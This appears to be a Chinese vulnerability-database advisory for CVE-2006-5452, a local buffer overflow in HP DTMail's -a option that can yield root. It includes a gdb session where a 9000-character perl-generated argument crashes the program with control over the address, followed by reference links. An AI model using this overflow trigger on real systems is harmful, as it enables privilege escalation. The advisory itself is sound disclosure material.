HP DTMail附件-a选项参数缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1193097 漏洞类型 缓冲区溢出
发布时间 2006-10-23 更新时间 2009-03-04
CVE编号 CVE-2006-5452 CNNVD-ID CNNVD-200610-382
漏洞平台 N/A CVSS评分 4.6
|漏洞来源
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-382
|漏洞详情
HPDTMail是在桌面上使用的邮件客户端。DTMail在处理-a选项参数时存在缓冲区溢出漏洞,本地攻击者可以利用此漏洞获得root用户权限。以下gdb输出显示了这个漏洞:gdb)r-a-a`perl-e'print"A"x9000'`Startingprogram:/cluster/members/member0/tmp/dtmail-a`perl-e'print"A"x9000'`(nodebuggingsymbolsfound)...(nodebuggingsymbolsfound)...(nodebuggingsymbolsfound)...(nodebuggingsymbolsfound)...(nodebuggingsymbolsfound)...(nodebuggingsymbolsfound)...(nodebuggingsymbolsfound)...(nodebuggingsymbolsfound)...(nodebuggingsymbolsfound)...(nodebuggingsymbolsfound)...(nodebuggingsymbolsfound)...(nodebuggingsymbolsfound)...(nodebuggingsymbolsfound)...(nodebuggingsymbolsfound)...(nodebuggingsymbolsfound)...(nodebuggingsymbolsfound)...(nodebuggingsymbolsfound)...(nodebuggingsymbolsfound)...ProgramreceivedsignalSIGSEGV,Segmentationfault.warning:Hitheuristic-fence-postwithoutfindingwarning:enclosingfunctionforaddress0x4141414141414140
|参考资料

来源:XF
名称:dtmail-tru64-bo(29644)
链接:http://xforce.iss.net/xforce/xfdb/29644
来源:SECTRACK
名称:1017099
链接:http://securitytracker.com/id?1017099
来源:SECTRACK
名称:1017098
链接:http://securitytracker.com/id?1017098
来源:HP
名称:HPSBUX02162
链接:http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00793091
来源:MISC
链接:http://www.netragard.com/pdfs/research/HP-TRU64-DTMAIL-20060810.txt
来源:SECTRACK
名称:1017083
链接:http://securitytracker.com/id?1017083
来源:OVAL
名称:oval:org.mitre.oval:def:5175
链接:http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:5175
来源:BID
名称:20580
链接:http://www.securityfocus.com/bid/20580
来源:HP
名称:HPSBTU02163
链接:http://www.securityfocus.com/archive/1/archive/1/449321/100/0/threaded
来源:VUPEN
名称:ADV-2006-4140
链接:http://www.frsirt.com/english/advisories/2006/4140
来源:VUPEN
名称:ADV-2006-4139
链接:http://www.frsirt.com/english/advisories/2006/4139
来源:SECUNIA
名称:22528
链接:http://secunia.com/advisories/22528
来源:SECUNIA
名称:22451
链接:http://secunia.com/advisories/224